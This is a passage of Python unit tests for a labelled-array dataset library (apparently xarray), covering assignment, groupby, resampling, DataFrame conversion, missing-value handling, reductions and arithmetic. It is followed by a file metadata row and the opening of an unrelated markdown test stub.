data1 = create_test_data()
data1['A'] = var
data2 = data1.copy()
data2['A'] = var
self.assertDatasetIdentical(data1, data2)
# assign a dataset array
dv = 2 * data2['A']
data1['B'] = dv.variable
data2['B'] = dv
self.assertDatasetIdentical(data1, data2)
# can't assign an ND array without dimensions
with self.assertRaisesRegexp(ValueError,
'dimensions .* must have the same len'):
data2['C'] = var.values.reshape(2, 4)
# but can assign a 1D array
data1['C'] = var.values
data2['C'] = ('C', var.values)
self.assertDatasetIdentical(data1, data2)
# can assign a scalar
data1['scalar'] = 0
data2['scalar'] = ([], 0)
self.assertDatasetIdentical(data1, data2)
# can't use the same dimension name as a scalar var
with self.assertRaisesRegexp(ValueError, 'cannot merge'):
data1['newvar'] = ('scalar', [3, 4, 5])
# can't resize a used dimension
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
data1['dim1'] = data1['dim1'][:5]
# override an existing value
data1['A'] = 3 * data2['A']
self.assertVariableEqual(data1['A'], 3 * data2['A'])
with self.assertRaises(NotImplementedError):
data1[{'x': 0}] = 0
def test_setitem_auto_align(self):
ds = Dataset()
ds['x'] = ('y', range(3))
ds['y'] = 1 + np.arange(3)
expected = Dataset({'x': ('y', range(3)), 'y': 1 + np.arange(3)})
self.assertDatasetIdentical(ds, expected)
ds['y'] = DataArray(range(3), dims='y')
expected = Dataset({'x': ('y', range(3))})
self.assertDatasetIdentical(ds, expected)
ds['x'] = DataArray([1, 2], dims='y')
expected = Dataset({'x': ('y', [1, 2, np.nan])})
self.assertDatasetIdentical(ds, expected)
ds['x'] = 42
expected = Dataset({'x': 42, 'y': range(3)})
self.assertDatasetIdentical(ds, expected)
ds['x'] = DataArray([4, 5, 6, 7], dims='y')
expected = Dataset({'x': ('y', [4, 5, 6])})
self.assertDatasetIdentical(ds, expected)
def test_assign(self):
ds = Dataset()
actual = ds.assign(x = [0, 1, 2], y = 2)
expected = Dataset({'x': [0, 1, 2], 'y': 2})
self.assertDatasetIdentical(actual, expected)
self.assertEqual(list(actual), ['x', 'y'])
self.assertDatasetIdentical(ds, Dataset())
actual = actual.assign(y = lambda ds: ds.x ** 2)
expected = Dataset({'y': ('x', [0, 1, 4])})
self.assertDatasetIdentical(actual, expected)
actual = actual.assign_coords(z = 2)
expected = Dataset({'y': ('x', [0, 1, 4])}, {'z': 2})
self.assertDatasetIdentical(actual, expected)
ds = Dataset({'a': ('x', range(3))}, {'b': ('x', ['A'] * 2 + ['B'])})
actual = ds.groupby('b').assign(c = lambda ds: 2 * ds.a)
expected = ds.merge({'c': ('x', [0, 2, 4])})
self.assertDatasetIdentical(actual, expected)
actual = ds.groupby('b').assign(c = lambda ds: ds.a.sum())
expected = ds.merge({'c': ('x', [1, 1, 2])})
self.assertDatasetIdentical(actual, expected)
actual = ds.groupby('b').assign_coords(c = lambda ds: ds.a.sum())
expected = expected.set_coords('c')
self.assertDatasetIdentical(actual, expected)
def test_delitem(self):
data = create_test_data()
all_items = set(data)
self.assertItemsEqual(data, all_items)
del data['var1']
self.assertItemsEqual(data, all_items - set(['var1']))
del data['dim1']
self.assertItemsEqual(data, set(['time', 'dim2', 'dim3', 'numbers']))
self.assertNotIn('dim1', data.dims)
self.assertNotIn('dim1', data.coords)
def test_squeeze(self):
data = Dataset({'foo': (['x', 'y', 'z'], [[[1], [2]]])})
for args in [[], [['x']], [['x', 'z']]]:
def get_args(v):
return [set(args[0]) & set(v.dims)] if args else []
expected = Dataset(dict((k, v.squeeze(*get_args(v)))
for k, v in iteritems(data.variables)))
expected.set_coords(data.coords, inplace=True)
self.assertDatasetIdentical(expected, data.squeeze(*args))
# invalid squeeze
with self.assertRaisesRegexp(ValueError, 'cannot select a dimension'):
data.squeeze('y')
def test_groupby(self):
data = Dataset({'z': (['x', 'y'], np.random.randn(3, 5))},
{'x': ('x', list('abc')),
'c': ('x', [0, 1, 0])})
groupby = data.groupby('x')
self.assertEqual(len(groupby), 3)
expected_groups = {'a': 0, 'b': 1, 'c': 2}
self.assertEqual(groupby.groups, expected_groups)
expected_items = [('a', data.isel(x=0)),
('b', data.isel(x=1)),
('c', data.isel(x=2))]
for actual, expected in zip(groupby, expected_items):
self.assertEqual(actual[0], expected[0])
self.assertDatasetEqual(actual[1], expected[1])
identity = lambda x: x
for k in ['x', 'c', 'y']:
actual = data.groupby(k, squeeze=False).apply(identity)
self.assertDatasetEqual(data, actual)
def test_groupby_returns_new_type(self):
data = Dataset({'z': (['x', 'y'], np.random.randn(3, 5))})
actual = data.groupby('x').apply(lambda ds: ds['z'])
expected = data['z']
self.assertDataArrayIdentical(expected, actual)
actual = data['z'].groupby('x').apply(lambda x: x.to_dataset())
expected = data
self.assertDatasetIdentical(expected, actual)
def test_groupby_iter(self):
data = create_test_data()
for n, (t, sub) in enumerate(list(data.groupby('dim1'))[:3]):
self.assertEqual(data['dim1'][n], t)
self.assertVariableEqual(data['var1'][n], sub['var1'])
self.assertVariableEqual(data['var2'][n], sub['var2'])
self.assertVariableEqual(data['var3'][:, n], sub['var3'])
def test_groupby_errors(self):
data = create_test_data()
with self.assertRaisesRegexp(ValueError, 'must be 1 dimensional'):
data.groupby('var1')
with self.assertRaisesRegexp(ValueError, 'must have a name'):
data.groupby(np.arange(10))
with self.assertRaisesRegexp(ValueError, 'length does not match'):
data.groupby(data['dim1'][:3])
with self.assertRaisesRegexp(ValueError, "must have a 'dims'"):
data.groupby(data.coords['dim1'].to_index())
def test_groupby_reduce(self):
data = Dataset({'xy': (['x', 'y'], np.random.randn(3, 4)),
'xonly': ('x', np.random.randn(3)),
'yonly': ('y', np.random.randn(4)),
'letters': ('y', ['a', 'a', 'b', 'b'])})
expected = data.mean('y')
expected['yonly'] = expected['yonly'].variable.expand_dims({'x': 3})
actual = data.groupby('x').mean()
self.assertDatasetAllClose(expected, actual)
actual = data.groupby('x').mean('y')
self.assertDatasetAllClose(expected, actual)
letters = data['letters']
expected = Dataset({'xy': data['xy'].groupby(letters).mean(),
'xonly': (data['xonly'].mean().variable
.expand_dims({'letters': 2})),
'yonly': data['yonly'].groupby(letters).mean()})
actual = data.groupby('letters').mean()
self.assertDatasetAllClose(expected, actual)
def test_groupby_math(self):
reorder_dims = lambda x: x.transpose('dim1', 'dim2', 'dim3', 'time')
ds = create_test_data()
for squeeze in [True, False]:
grouped = ds.groupby('dim1', squeeze=squeeze)
expected = reorder_dims(ds + ds.coords['dim1'])
actual = grouped + ds.coords['dim1']
self.assertDatasetIdentical(expected, reorder_dims(actual))
actual = ds.coords['dim1'] + grouped
self.assertDatasetIdentical(expected, reorder_dims(actual))
ds2 = 2 * ds
expected = reorder_dims(ds + ds2)
actual = grouped + ds2
self.assertDatasetIdentical(expected, reorder_dims(actual))
actual = ds2 + grouped
self.assertDatasetIdentical(expected, reorder_dims(actual))
grouped = ds.groupby('numbers')
zeros = DataArray([0, 0, 0, 0], [('numbers', range(4))])
expected = ((ds + Variable('dim3', np.zeros(10)))
.transpose('dim3', 'dim1', 'dim2', 'time'))
actual = grouped + zeros
self.assertDatasetEqual(expected, actual)
actual = zeros + grouped
self.assertDatasetEqual(expected, actual)
with self.assertRaisesRegexp(ValueError, 'dimensions .* do not exist'):
grouped + ds
with self.assertRaisesRegexp(ValueError, 'dimensions .* do not exist'):
ds + grouped
with self.assertRaisesRegexp(TypeError, 'only support binary ops'):
grouped + 1
with self.assertRaisesRegexp(TypeError, 'only support binary ops'):
grouped + grouped
with self.assertRaisesRegexp(TypeError, 'in-place operations'):
ds += grouped
ds = Dataset({'x': ('time', np.arange(100)),
'time': pd.date_range('2000-01-01', periods=100)})
with self.assertRaisesRegexp(ValueError, 'no overlapping labels'):
ds + ds.groupby('time.month')
def test_groupby_math_virtual(self):
ds = Dataset({'x': ('t', [1, 2, 3])},
{'t': pd.date_range('20100101', periods=3)})
grouped = ds.groupby('t.day')
actual = grouped - grouped.mean()
expected = Dataset({'x': ('t', [0, 0, 0])},
ds[['t', 't.day']])
self.assertDatasetIdentical(actual, expected)
def test_groupby_nan(self):
# nan should be excluded from groupby
ds = Dataset({'foo': ('x', [1, 2, 3, 4])},
{'bar': ('x', [1, 1, 2, np.nan])})
actual = ds.groupby('bar').mean()
expected = Dataset({'foo': ('bar', [1.5, 3]), 'bar': [1, 2]})
self.assertDatasetIdentical(actual, expected)
def test_resample_and_first(self):
times = pd.date_range('2000-01-01', freq='6H', periods=10)
ds = Dataset({'foo': (['time', 'x', 'y'], np.random.randn(10, 5, 3)),
'bar': ('time', np.random.randn(10), {'meta': 'data'}),
'time': times})
actual = ds.resample('1D', dim='time', how='first')
expected = ds.isel(time=[0, 4, 8])
self.assertDatasetIdentical(expected, actual)
# upsampling
expected_time = pd.date_range('2000-01-01', freq='3H', periods=19)
expected = ds.reindex(time=expected_time)
for how in ['mean', 'sum', 'first', 'last', np.mean]:
actual = ds.resample('3H', 'time', how=how)
self.assertDatasetEqual(expected, actual)
def test_to_array(self):
ds = Dataset(OrderedDict([('a', 1), ('b', ('x', [1, 2, 3]))]),
coords={'c': 42}, attrs={'Conventions': 'None'})
data = [[1, 1, 1], [1, 2, 3]]
coords = {'x': range(3), 'c': 42, 'variable': ['a', 'b']}
dims = ('variable', 'x')
expected = DataArray(data, coords, dims, attrs=ds.attrs)
actual = ds.to_array()
self.assertDataArrayIdentical(expected, actual)
actual = ds.to_array('abc', name='foo')
expected = expected.rename({'variable': 'abc'}).rename('foo')
self.assertDataArrayIdentical(expected, actual)
def test_to_and_from_dataframe(self):
x = np.random.randn(10)
y = np.random.randn(10)
t = list('abcdefghij')
ds = Dataset(OrderedDict([('a', ('t', x)),
('b', ('t', y)),
('t', ('t', t))]))
expected = pd.DataFrame(np.array([x, y]).T, columns=['a', 'b'],
index=pd.Index(t, name='t'))
actual = ds.to_dataframe()
# use the .equals method to check all DataFrame metadata
assert expected.equals(actual), (expected, actual)
# verify coords are included
actual = ds.set_coords('b').to_dataframe()
assert expected.equals(actual), (expected, actual)
# check roundtrip
self.assertDatasetIdentical(ds, Dataset.from_dataframe(actual))
# test a case with a MultiIndex
w = np.random.randn(2, 3)
ds = Dataset({'w': (('x', 'y'), w)})
ds['y'] = ('y', list('abc'))
exp_index = pd.MultiIndex.from_arrays(
[[0, 0, 0, 1, 1, 1], ['a', 'b', 'c', 'a', 'b', 'c']],
names=['x', 'y'])
expected = pd.DataFrame(w.reshape(-1), columns=['w'], index=exp_index)
actual = ds.to_dataframe()
self.assertTrue(expected.equals(actual))
# check roundtrip
self.assertDatasetIdentical(ds, Dataset.from_dataframe(actual))
# check pathological cases
df = pd.DataFrame([1])
actual = Dataset.from_dataframe(df)
expected = Dataset({0: ('index', [1])})
self.assertDatasetIdentical(expected, actual)
df = pd.DataFrame()
actual = Dataset.from_dataframe(df)
expected = Dataset()
self.assertDatasetIdentical(expected, actual)
# regression test for GH278
# use int64 to ensure consistent results for the pandas .equals method
# on windows (which requires the same dtype)
ds = Dataset({'x': pd.Index(['bar']),
'a': ('y', np.array([1], 'int64'))}).isel(x=0)
# use .loc to ensure consistent results on Python 3
actual = ds.to_dataframe().loc[:, ['a', 'x']]
expected = pd.DataFrame([[1, 'bar']], index=pd.Index([0], name='y'),
columns=['a', 'x'])
assert expected.equals(actual), (expected, actual)
ds = Dataset({'x': np.array([0], 'int64'),
'y': np.array([1], 'int64')})
actual = ds.to_dataframe()
idx = pd.MultiIndex.from_arrays([[0], [1]], names=['x', 'y'])
expected = pd.DataFrame([[]], index=idx)
assert expected.equals(actual), (expected, actual)
# regression test for GH449
df = pd.DataFrame(np.zeros((2, 2)))
df.columns = ['foo', 'foo']
with self.assertRaisesRegexp(ValueError, 'non-unique columns'):
Dataset.from_dataframe(df)
def test_pickle(self):
data = create_test_data()
roundtripped = pickle.loads(pickle.dumps(data))
self.assertDatasetIdentical(data, roundtripped)
# regression test for #167:
self.assertEqual(data.dims, roundtripped.dims)
def test_lazy_load(self):
store = InaccessibleVariableDataStore()
create_test_data().dump_to_store(store)
for decode_cf in [True, False]:
ds = open_dataset(store, decode_cf=decode_cf)
with self.assertRaises(UnexpectedDataAccess):
ds.load()
with self.assertRaises(UnexpectedDataAccess):
ds['var1'].values
# these should not raise UnexpectedDataAccess:
ds.isel(time=10)
ds.isel(time=slice(10), dim1=[0]).isel(dim1=0, dim2=-1)
def test_dropna(self):
x = np.random.randn(4, 4)
x[::2, 0] = np.nan
y = np.random.randn(4)
y[-1] = np.nan
ds = Dataset({'foo': (('a', 'b'), x), 'bar': (('b', y))})
expected = ds.isel(a=slice(1, None, 2))
actual = ds.dropna('a')
self.assertDatasetIdentical(actual, expected)
expected = ds.isel(b=slice(1, 3))
actual = ds.dropna('b')
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('b', subset=['foo', 'bar'])
self.assertDatasetIdentical(actual, expected)
expected = ds.isel(b=slice(1, None))
actual = ds.dropna('b', subset=['foo'])
self.assertDatasetIdentical(actual, expected)
expected = ds.isel(b=slice(3))
actual = ds.dropna('b', subset=['bar'])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('a', subset=[])
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('a', subset=['bar'])
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('a', how='all')
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('b', how='all', subset=['bar'])
expected = ds.isel(b=[0, 1, 2])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('b', thresh=1, subset=['bar'])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('b', thresh=2)
self.assertDatasetIdentical(actual, ds)
actual = ds.dropna('b', thresh=4)
expected = ds.isel(b=[1, 2, 3])
self.assertDatasetIdentical(actual, expected)
actual = ds.dropna('a', thresh=3)
expected = ds.isel(a=[1, 3])
self.assertDatasetIdentical(actual, ds)
with self.assertRaisesRegexp(ValueError, 'a single dataset dimension'):
ds.dropna('foo')
with self.assertRaisesRegexp(ValueError, 'invalid how'):
ds.dropna('a', how='somehow')
with self.assertRaisesRegexp(TypeError, 'must specify how or thresh'):
ds.dropna('a', how=None)
def test_fillna(self):
ds = Dataset({'a': ('x', [np.nan, 1, np.nan, 3])})
# fill with -1
actual = ds.fillna(-1)
expected = Dataset({'a': ('x', [-1, 1, -1, 3])})
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna({'a': -1})
self.assertDatasetIdentical(expected, actual)
other = Dataset({'a': -1})
actual = ds.fillna(other)
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna({'a': other.a})
self.assertDatasetIdentical(expected, actual)
# fill with range(4)
b = DataArray(range(4), dims='x')
actual = ds.fillna(b)
expected = b.rename('a').to_dataset()
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna(expected)
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna(range(4))
self.assertDatasetIdentical(expected, actual)
actual = ds.fillna(b[:3])
self.assertDatasetIdentical(expected, actual)
# left align variables
ds['b'] = np.nan
actual = ds.fillna({'a': -1, 'c': 'foobar'})
expected = Dataset({'a': ('x', [-1, 1, -1, 3]), 'b': np.nan})
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'no overlapping'):
ds.fillna({'x': 0})
with self.assertRaisesRegexp(ValueError, 'no overlapping'):
ds.fillna(Dataset(coords={'a': 0}))
# groupby
expected = Dataset({'a': ('x', range(4))})
for target in [ds, expected]:
target.coords['b'] = ('x', [0, 0, 1, 1])
actual = ds.groupby('b').fillna(DataArray([0, 2], dims='b'))
self.assertDatasetIdentical(expected, actual)
actual = ds.groupby('b').fillna(Dataset({'a': ('b', [0, 2])}))
self.assertDatasetIdentical(expected, actual)
def test_where(self):
ds = Dataset({'a': ('x', range(5))})
expected = Dataset({'a': ('x', [np.nan, np.nan, 2, 3, 4])})
actual = ds.where(ds > 1)
self.assertDatasetIdentical(expected, actual)
actual = ds.where(ds.a > 1)
self.assertDatasetIdentical(expected, actual)
actual = ds.where(ds.a.values > 1)
self.assertDatasetIdentical(expected, actual)
actual = ds.where(True)
self.assertDatasetIdentical(ds, actual)
expected = ds.copy(deep=True)
expected['a'].values = [np.nan] * 5
actual = ds.where(False)
self.assertDatasetIdentical(expected, actual)
# 2d
ds = Dataset({'a': (('x', 'y'), [[0, 1], [2, 3]])})
expected = Dataset({'a': (('x', 'y'), [[np.nan, 1], [2, 3]])})
actual = ds.where(ds > 0)
self.assertDatasetIdentical(expected, actual)
# groupby
ds = Dataset({'a': ('x', range(5))}, {'c': ('x', [0, 0, 1, 1, 1])})
cond = Dataset({'a': ('c', [True, False])})
expected = ds.copy(deep=True)
expected['a'].values = [0, 1] + [np.nan] * 3
actual = ds.groupby('c').where(cond)
self.assertDatasetIdentical(expected, actual)
def test_reduce(self):
data = create_test_data()
self.assertEqual(len(data.mean().coords), 0)
actual = data.max()
expected = Dataset(dict((k, v.max())
for k, v in iteritems(data.data_vars)))
self.assertDatasetEqual(expected, actual)
self.assertDatasetEqual(data.min(dim=['dim1']),
data.min(dim='dim1'))
for reduct, expected in [('dim2', ['dim1', 'dim3', 'time']),
(['dim2', 'time'], ['dim1', 'dim3']),
(('dim2', 'time'), ['dim1', 'dim3']),
((), ['dim1', 'dim2', 'dim3', 'time'])]:
actual = data.min(dim=reduct).dims
print(reduct, actual, expected)
self.assertItemsEqual(actual, expected)
self.assertDatasetEqual(data.mean(dim=[]), data)
def test_reduce_bad_dim(self):
data = create_test_data()
with self.assertRaisesRegexp(ValueError, 'Dataset does not contain'):
ds = data.mean(dim='bad_dim')
def test_reduce_non_numeric(self):
data1 = create_test_data(seed=44)
data2 = create_test_data(seed=44)
add_vars = {'var4': ['dim1', 'dim2']}
for v, dims in sorted(add_vars.items()):
size = tuple(data1.dims[d] for d in dims)
data = np.random.random_integers(0, 100, size=size).astype(np.str_)
data1[v] = (dims, data, {'foo': 'variable'})
self.assertTrue('var4' not in data1.mean())
self.assertDatasetEqual(data1.mean(), data2.mean())
self.assertDatasetEqual(data1.mean(dim='dim1'),
data2.mean(dim='dim1'))
def test_reduce_strings(self):
expected = Dataset({'x': 'a'})
ds = Dataset({'x': ('y', ['a', 'b'])})
actual = ds.min()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 'b'})
actual = ds.max()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 0})
actual = ds.argmin()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 1})
actual = ds.argmax()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': b'a'})
ds = Dataset({'x': ('y', np.array(['a', 'b'], 'S1'))})
actual = ds.min()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': u'a'})
ds = Dataset({'x': ('y', np.array(['a', 'b'], 'U1'))})
actual = ds.min()
self.assertDatasetIdentical(expected, actual)
def test_reduce_dtypes(self):
# regression test for GH342
expected = Dataset({'x': 1})
actual = Dataset({'x': True}).sum()
self.assertDatasetIdentical(expected, actual)
# regression test for GH505
expected = Dataset({'x': 3})
actual = Dataset({'x': ('y', np.array([1, 2], 'uint16'))}).sum()
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'x': 1 + 1j})
actual = Dataset({'x': ('y', [1, 1j])}).sum()
self.assertDatasetIdentical(expected, actual)
def test_reduce_keep_attrs(self):
data = create_test_data()
_attrs = {'attr1': 'value1', 'attr2': 2929}
attrs = OrderedDict(_attrs)
data.attrs = attrs
# Test dropped attrs
ds = data.mean()
self.assertEqual(ds.attrs, {})
for v in ds.data_vars.values():
self.assertEqual(v.attrs, {})
# Test kept attrs
ds = data.mean(keep_attrs=True)
self.assertEqual(ds.attrs, attrs)
for k, v in ds.data_vars.items():
self.assertEqual(v.attrs, data[k].attrs)
def test_reduce_argmin(self):
# regression test for #205
ds = Dataset({'a': ('x', [0, 1])})
expected = Dataset({'a': ([], 0)})
actual = ds.argmin()
self.assertDatasetIdentical(expected, actual)
actual = ds.argmin('x')
self.assertDatasetIdentical(expected, actual)
def test_reduce_scalars(self):
ds = Dataset({'x': ('a', [2, 2]), 'y': 2, 'z': ('b', [2])})
expected = Dataset({'x': 0, 'y': 0, 'z': 0})
actual = ds.var()
self.assertDatasetIdentical(expected, actual)
def test_reduce_only_one_axis(self):
def mean_only_one_axis(x, axis):
if not isinstance(axis, (int, np.integer)):
raise TypeError('non-integer axis')
return x.mean(axis)
ds = Dataset({'a': (['x', 'y'], [[0, 1, 2, 3, 4]])})
expected = Dataset({'a': ('x', [2])})
actual = ds.reduce(mean_only_one_axis, 'y')
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(TypeError, 'non-integer axis'):
ds.reduce(mean_only_one_axis)
with self.assertRaisesRegexp(TypeError, 'non-integer axis'):
ds.reduce(mean_only_one_axis, ['x', 'y'])
def test_count(self):
ds = Dataset({'x': ('a', [np.nan, 1]), 'y': 0, 'z': np.nan})
expected = Dataset({'x': 1, 'y': 1, 'z': 0})
actual = ds.count()
self.assertDatasetIdentical(expected, actual)
def test_apply(self):
data = create_test_data()
data.attrs['foo'] = 'bar'
self.assertDatasetIdentical(data.apply(np.mean), data.mean())
expected = data.mean(keep_attrs=True)
actual = data.apply(lambda x: x.mean(keep_attrs=True), keep_attrs=True)
self.assertDatasetIdentical(expected, actual)
self.assertDatasetIdentical(data.apply(lambda x: x, keep_attrs=True),
data.drop('time'))
def scale(x, multiple=1):
return multiple * x
actual = data.apply(scale, multiple=2)
self.assertDataArrayEqual(actual['var1'], 2 * data['var1'])
self.assertDataArrayIdentical(actual['numbers'], data['numbers'])
actual = data.apply(np.asarray)
expected = data.drop('time') # time is not used on a data var
self.assertDatasetEqual(expected, actual)
def make_example_math_dataset(self):
variables = OrderedDict(
[('bar', ('x', np.arange(100, 400, 100))),
('foo', (('x', 'y'), 1.0 * np.arange(12).reshape(3, 4)))])
coords = {'abc': ('x', ['a', 'b', 'c']),
'y': 10 * np.arange(4)}
ds = Dataset(variables, coords)
ds['foo'][0, 0] = np.nan
return ds
def test_dataset_number_math(self):
ds = self.make_example_math_dataset()
self.assertDatasetIdentical(ds, +ds)
self.assertDatasetIdentical(ds, ds + 0)
self.assertDatasetIdentical(ds, 0 + ds)
self.assertDatasetIdentical(ds, ds + np.array(0))
self.assertDatasetIdentical(ds, np.array(0) + ds)
actual = ds.copy(deep=True)
actual += 0
self.assertDatasetIdentical(ds, actual)
def test_unary_ops(self):
ds = self.make_example_math_dataset()
self.assertDatasetIdentical(ds.apply(abs), abs(ds))
self.assertDatasetIdentical(ds.apply(lambda x: x + 4), ds + 4)
for func in [lambda x: x.isnull(),
lambda x: x.round(),
lambda x: x.astype(int)]:
self.assertDatasetIdentical(ds.apply(func), func(ds))
self.assertDatasetIdentical(ds.isnull(), ~ds.notnull())
# don't actually patch these methods in
with self.assertRaises(AttributeError):
ds.item
with self.assertRaises(AttributeError):
ds.searchsorted
def test_dataset_array_math(self):
ds = self.make_example_math_dataset()
expected = ds.apply(lambda x: x - ds['foo'])
self.assertDatasetIdentical(expected, ds - ds['foo'])
self.assertDatasetIdentical(expected, -ds['foo'] + ds)
self.assertDatasetIdentical(expected, ds - ds['foo'].variable)
self.assertDatasetIdentical(expected, -ds['foo'].variable + ds)
actual = ds.copy(deep=True)
actual -= ds['foo']
self.assertDatasetIdentical(expected, actual)
expected = ds.apply(lambda x: x + ds['bar'])
self.assertDatasetIdentical(expected, ds + ds['bar'])
actual = ds.copy(deep=True)
actual += ds['bar']
self.assertDatasetIdentical(expected, actual)
expected = Dataset({'bar': ds['bar'] + np.arange(3)})
self.assertDatasetIdentical(expected, ds[['bar']] + np.arange(3))
self.assertDatasetIdentical(expected, np.arange(3) + ds[['bar']])
def test_dataset_dataset_math(self):
ds = self.make_example_math_dataset()
self.assertDatasetIdentical(ds, ds + 0 * ds)
self.assertDatasetIdentical(ds, ds + {'foo': 0, 'bar': 0})
expected = ds.apply(lambda x: 2 * x)
self.assertDatasetIdentical(expected, 2 * ds)
self.assertDatasetIdentical(expected, ds + ds)
self.assertDatasetIdentical(expected, ds + ds.data_vars)
self.assertDatasetIdentical(expected, ds + dict(ds.data_vars))
actual = ds.copy(deep=True)
expected_id = id(actual)
actual += ds
self.assertDatasetIdentical(expected, actual)
self.assertEqual(expected_id, id(actual))
self.assertDatasetIdentical(ds == ds, ds.notnull())
subsampled = ds.isel(y=slice(2))
expected = 2 * subsampled
self.assertDatasetIdentical(expected, subsampled + ds)
self.assertDatasetIdentical(expected, ds + subsampled)
def test_dataset_math_auto_align(self):
ds = self.make_example_math_dataset()
subset = ds.isel(x=slice(2), y=[1, 3])
expected = 2 * subset
actual = ds + subset
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'no overlapping labels'):
ds.isel(x=slice(1)) + ds.isel(x=slice(1, None))
actual = ds + ds[['bar']]
expected = (2 * ds[['bar']]).merge(ds.coords)
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'no overlapping data'):
ds + Dataset()
with self.assertRaisesRegexp(ValueError, 'no overlapping data'):
Dataset() + Dataset()
ds2 = Dataset(coords={'bar': 42})
with self.assertRaisesRegexp(ValueError, 'no overlapping data'):
ds + ds2
# maybe unary arithmetic with empty datasets should raise instead?
self.assertDatasetIdentical(Dataset() + 1, Dataset())
for other in [ds.isel(x=slice(2)), ds.bar.isel(x=slice(0))]:
actual = ds.copy(deep=True)
other = ds.isel(x=slice(2))
actual += other
expected = ds + other.reindex_like(ds)
self.assertDatasetIdentical(expected, actual)
def test_dataset_math_errors(self):
ds = self.make_example_math_dataset()
with self.assertRaises(TypeError):
ds['foo'] += ds
with self.assertRaises(TypeError):
ds['foo'].variable += ds
with self.assertRaisesRegexp(ValueError, 'must have the same'):
ds += ds[['bar']]
# verify we can rollback in-place operations if something goes wrong
# nb. inplace datetime64 math actually will work with an integer array
# but not floats thanks to numpy's inconsistent handling
other = DataArray(np.datetime64('2000-01-01T12'), coords={'c': 2})
actual = ds.copy(deep=True)
with self.assertRaises(TypeError):
actual += other
self.assertDatasetIdentical(actual, ds)
def test_dataset_transpose(self):
ds = Dataset({'a': (('x', 'y'), np.random.randn(3, 4)),
'b': (('y', 'x'), np.random.randn(4, 3))})
actual = ds.transpose()
expected = ds.apply(lambda x: x.transpose())
self.assertDatasetIdentical(expected, actual)
actual = ds.T
self.assertDatasetIdentical(expected, actual)
actual = ds.transpose('x', 'y')
expected = ds.apply(lambda x: x.transpose('x', 'y'))
self.assertDatasetIdentical(expected, actual)
ds = create_test_data()
actual = ds.transpose()
for k in ds:
self.assertEqual(actual[k].dims[::-1], ds[k].dims)
new_order = ('dim2', 'dim3', 'dim1', 'time')
actual = ds.transpose(*new_order)
for k in ds:
expected_dims = tuple(d for d in new_order if d in ds[k].dims)
self.assertEqual(actual[k].dims, expected_dims)
with self.assertRaisesRegexp(ValueError, 'arguments to transpose'):
ds.transpose('dim1', 'dim2', 'dim3')
with self.assertRaisesRegexp(ValueError, 'arguments to transpose'):
ds.transpose('dim1', 'dim2', 'dim3', 'time', 'extra_dim')
def test_dataset_diff_n1_simple(self):
ds = Dataset({'foo': ('x', [5, 5, 6, 6])})
actual = ds.diff('x')
expected = Dataset({'foo': ('x', [0, 1, 0])})
expected.coords['x'].values = [1, 2, 3]
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_n1_lower(self):
ds = Dataset({'foo': ('x', [5, 5, 6, 6])})
actual = ds.diff('x', label='lower')
expected = Dataset({'foo': ('x', [0, 1, 0])})
expected.coords['x'].values = [0, 1, 2]
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_n1(self):
ds = create_test_data(seed=1)
actual = ds.diff('dim2')
expected = dict()
expected['var1'] = DataArray(np.diff(ds['var1'].values, axis=1),
[ds['dim1'].values,
ds['dim2'].values[1:]],
['dim1', 'dim2'])
expected['var2'] = DataArray(np.diff(ds['var2'].values, axis=1),
[ds['dim1'].values,
ds['dim2'].values[1:]],
['dim1', 'dim2'])
expected['var3'] = ds['var3']
expected = Dataset(expected, coords={'time': ds['time'].values})
expected.coords['numbers'] = ('dim3', ds['numbers'].values)
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_n2(self):
ds = create_test_data(seed=1)
actual = ds.diff('dim2', n=2)
expected = dict()
expected['var1'] = DataArray(np.diff(ds['var1'].values, axis=1, n=2),
[ds['dim1'].values,
ds['dim2'].values[2:]],
['dim1', 'dim2'])
expected['var2'] = DataArray(np.diff(ds['var2'].values, axis=1, n=2),
[ds['dim1'].values,
ds['dim2'].values[2:]],
['dim1', 'dim2'])
expected['var3'] = ds['var3']
expected = Dataset(expected, coords={'time': ds['time'].values})
expected.coords['numbers'] = ('dim3', ds['numbers'].values)
self.assertDatasetEqual(expected, actual)
def test_dataset_diff_exception_n_neg(self):
ds = create_test_data(seed=1)
with self.assertRaisesRegexp(ValueError, 'must be non-negative'):
ds.diff('dim2', n=-1)
def test_dataset_diff_exception_label_str(self):
ds = create_test_data(seed=1)
with self.assertRaisesRegexp(ValueError, '\'label\' argument has to'):
ds.diff('dim2', label='raise_me')
def test_real_and_imag(self):
attrs = {'foo': 'bar'}
ds = Dataset({'x': ((), 1 + 2j, attrs)}, attrs=attrs)
expected_re = Dataset({'x': ((), 1, attrs)}, attrs=attrs)
self.assertDatasetIdentical(ds.real, expected_re)
expected_im = Dataset({'x': ((), 2, attrs)}, attrs=attrs)
self.assertDatasetIdentical(ds.imag, expected_im)
| apache-2.0 | -6,595,006,660,729,003,000 | 39.5831 | 88 | 0.551531 | false |
zwimer/IntroToOpenSourceLabs | Lab6/markdown.py/test_markdown_unittest.py | 1 | 1156 | '''
Test markdown.py with unittest
To run tests:
python test_markdown_unittest.py
'''
import unittest
from markdown_adapter import run_markdown
class TestMarkdownPy(unittest.TestCase):
def setUp(self):
pass
